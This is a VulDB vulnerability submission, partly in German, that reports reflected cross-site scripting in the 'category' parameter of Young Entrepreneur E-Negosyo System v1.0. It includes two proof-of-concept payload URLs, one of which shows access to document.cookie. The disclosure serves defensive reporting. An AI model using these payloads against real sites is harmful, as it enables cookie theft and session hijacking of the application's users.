Submit #103065: Young Entrepreneur E-Negosyo System v1.0 /bsenordering/index.php GET parameter category exists XSS vulnerabilityinfo

TitelYoung Entrepreneur E-Negosyo System v1.0 /bsenordering/index.php GET parameter category exists XSS vulnerability
BeschreibungAn issue was discovered in Young Entrepreneur E-Negosyo System v1.0. There is a XSS vulnerability that it is possible to inject arbitrary JavaScript into the application's response via /bsenordering/index.php?category. Payload1:/bsenordering/index.php?category=<script>alert(222)</script>&q=product Payload2:/bsenordering/index.php?category=<script>alert(document.cookie)</script>&q=product
Quelle⚠️ https://github.com/2714925725/bug_report/blob/main/XSS-1.md
Benutzer
 mengleng (UID 43260)
Einreichung18.03.2023 14:43 (vor 3 Jahren)
Moderieren18.03.2023 20:57 (6 hours later)
StatusAkzeptiert
VulDB Eintrag223371 [SourceCodester Young Entrepreneur E-Negosyo System 1.0 GET Parameter /bsenordering/index.php Kategorie Cross Site Scripting]
Punkte20

ZurückÜbersichtWeiter

Do you need the next level of professionalism?

Upgrade your account now!